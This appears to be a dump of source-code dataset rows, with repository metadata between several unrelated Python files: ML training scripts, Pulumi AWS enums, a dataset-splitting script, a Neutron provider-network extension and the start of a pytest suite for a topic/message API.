input_tensors = [model.outputs, model.summ_op, model.sparsity]
result_val = sess.run(input_tensors, feed_dict)
# Check summary and print results
if (itr+1) % args.check_interval == 0:
writer['train'].add_summary(result[1], itr)
writer['val'].add_summary(result_val[1], itr)
pstr = '(train/val) los:{:.3f}/{:.3f} acc:{:.3f}/{:.3f} spa:{:.3f} lr:{:.7f}'.format(
result[0]['los'], result_val[0]['los'],
result[0]['acc'], result_val[0]['acc'],
result[2], result[0]['lr'],
)
print('itr{}: {} (t:{:.1f})'.format(itr+1, pstr, time.time() - t_start))
t_start = time.time()
# Save model
if best_val_loss > result_val[0]['los']:
print('save model, becase best_val_loss({:.3f}) > current_val_loss({:.3f})'.format(
best_val_loss, result_val[0]['los']
))
saver.save(sess, args.path_model + '/itr-' + str(itr))
best_val_loss = result_val[0]['los']
# # Save model
# if (itr+1) % args.save_interval == 0:
# saver.save(sess, args.path_model + '/itr-' + str(itr))
| 2,866
| 0
| 23
|
0e58e67d4649d5ef878008d9074dacf7645f53e2
| 4,768
|
py
|
Python
|
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
from keras_retinanet.bin.train import train_main
from keras_retinanet import models
import glob
import numpy as np
from sklearn.metrics import f1_score
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
| 103.652174
| 3,138
| 0.676594
|
from keras_retinanet.bin.train import train_main
from keras_retinanet import models
import glob
import numpy as np
from sklearn.metrics import f1_score
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
| 0
| 0
| 0
|
27d6a355d2304d3fc689d470c15bce5dbf127caf
| 5,795
|
py
|
Python
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
class ObjectTypeFieldContentType(str, Enum):
"""
The content type of the field. Used for determining equality when searching.
"""
STRING = "STRING"
NUMBER = "NUMBER"
PHONE_NUMBER = "PHONE_NUMBER"
EMAIL_ADDRESS = "EMAIL_ADDRESS"
NAME = "NAME"
| 30.025907
| 80
| 0.718033
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
class IntegrationConnectorType(str, Enum):
SALESFORCE = "Salesforce"
MARKETO = "Marketo"
SERVICE_NOW = "ServiceNow"
ZENDESK = "Zendesk"
S3 = "S3"
class IntegrationMarketoConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationOperatorPropertiesKeys(str, Enum):
VALUE = "VALUE"
VALUES = "VALUES"
DATA_TYPE = "DATA_TYPE"
UPPER_BOUND = "UPPER_BOUND"
LOWER_BOUND = "LOWER_BOUND"
SOURCE_DATA_TYPE = "SOURCE_DATA_TYPE"
DESTINATION_DATA_TYPE = "DESTINATION_DATA_TYPE"
VALIDATION_ACTION = "VALIDATION_ACTION"
MASK_VALUE = "MASK_VALUE"
MASK_LENGTH = "MASK_LENGTH"
TRUNCATE_LENGTH = "TRUNCATE_LENGTH"
MATH_OPERATION_FIELDS_ORDER = "MATH_OPERATION_FIELDS_ORDER"
CONCAT_FORMAT = "CONCAT_FORMAT"
SUBFIELD_CATEGORY_MAP = "SUBFIELD_CATEGORY_MAP"
class IntegrationS3ConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationSalesforceConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationScheduledTriggerPropertiesDataPullMode(str, Enum):
INCREMENTAL = "Incremental"
COMPLETE = "Complete"
class IntegrationServiceNowConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationTaskType(str, Enum):
ARITHMETIC = "Arithmetic"
FILTER = "Filter"
MAP = "Map"
MASK = "Mask"
MERGE = "Merge"
TRUNCATE = "Truncate"
VALIDATE = "Validate"
class IntegrationTriggerType(str, Enum):
SCHEDULED = "Scheduled"
EVENT = "Event"
ON_DEMAND = "OnDemand"
class IntegrationZendeskConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
GREATER_THAN = "GREATER_THAN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class ObjectTypeFieldContentType(str, Enum):
"""
The content type of the field. Used for determining equality when searching.
"""
STRING = "STRING"
NUMBER = "NUMBER"
PHONE_NUMBER = "PHONE_NUMBER"
EMAIL_ADDRESS = "EMAIL_ADDRESS"
NAME = "NAME"
class ObjectTypeKeyStandardIdentifiersItem(str, Enum):
PROFILE = "PROFILE"
UNIQUE = "UNIQUE"
SECONDARY = "SECONDARY"
LOOKUP_ONLY = "LOOKUP_ONLY"
NEW_ONLY = "NEW_ONLY"
| 0
| 4,568
| 253
|
2d12ec7f50c3d061e4b79a9ffffcc034bd787b1d
| 2,104
|
py
|
Python
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | 1
|
2021-11-02T05:13:12.000Z
|
2021-11-02T05:13:12.000Z
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | 1
|
2021-12-17T14:29:18.000Z
|
2021-12-17T14:29:18.000Z
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | null | null | null |
import numpy as np
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
#vaidation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
| 41.254902
| 112
| 0.661122
|
import numpy as np
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
#vaidation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
| 0
| 0
| 0
|
ae765890a283e1cafc55cfc222fa3eddff1f2a46
| 2,302
|
py
|
Python
|
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import extensions
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
class Providernet(extensions.ExtensionDescriptor):
"""Extension class supporting provider networks.
This class is used by neutron's extension framework to make
metadata about the provider network extension available to
clients. No new resources are defined by this extension. Instead,
the existing network resource's request and response messages are
extended with attributes in the provider namespace.
With admin rights, network dictionaries returned will also include
provider attributes.
"""
@classmethod
@classmethod
@classmethod
@classmethod
| 32.885714
| 78
| 0.728931
|
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import extensions
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
class Providernet(extensions.ExtensionDescriptor):
"""Extension class supporting provider networks.
This class is used by neutron's extension framework to make
metadata about the provider network extension available to
clients. No new resources are defined by this extension. Instead,
the existing network resource's request and response messages are
extended with attributes in the provider namespace.
With admin rights, network dictionaries returned will also include
provider attributes.
"""
@classmethod
def get_name(cls):
return provider_net.NAME
@classmethod
def get_alias(cls):
return provider_net.ALIAS
@classmethod
def get_description(cls):
return provider_net.DESCRIPTION
@classmethod
def get_updated(cls):
return provider_net.UPDATED_TIMESTAMP
def get_extended_resources(self, version):
if version == "2.0":
return provider_net.RESOURCE_ATTRIBUTE_MAP
else:
return {}
| 293
| 0
| 131
|
8d7f3685a45adea2ebce073ffebe24607e61fa6d
| 3,181
|
py
|
Python
|
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | null | null | null |
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | 9
|
2020-01-27T02:08:04.000Z
|
2020-01-27T02:46:53.000Z
|
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | null | null | null |
import pytest
import asyncio
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from essential_cosmic.app import make_app
| 31.186275
| 85
| 0.607042
|
import pytest
import asyncio
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from essential_cosmic.app import make_app
class TestConsumer:
@pytest.fixture(scope="function")
async def cli(self, aiohttp_client):
client = await aiohttp_client(make_app())
return client
@pytest.fixture(scope="function")
async def topic(self, cli):
resp = await cli.post("/topic", json={"title": "Test Topic"})
topic = await resp.json()
return topic
@pytest.fixture(scope="function")
async def messages(self, cli, topic):
resps = await asyncio.gather(
*[
cli.post(
"/topic/%s/message" % topic["id"], json={"value": "Test Message"}
)
for _ in range(3)
]
)
messages = await asyncio.gather(*[resp.json() for resp in resps])
return messages
async def test_topic_list(self, cli, topic):
resp = await cli.get("/topic")
assert resp.status == 200
body_json = await resp.json()
assert type(body_json) == list
assert len(body_json) == 1
async def test_topic_detail(self, cli, topic):
resp = await cli.get("/topic/%s" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == topic
async def test_topic_detail_missing(self, cli):
resp = await cli.get("/topic/missing")
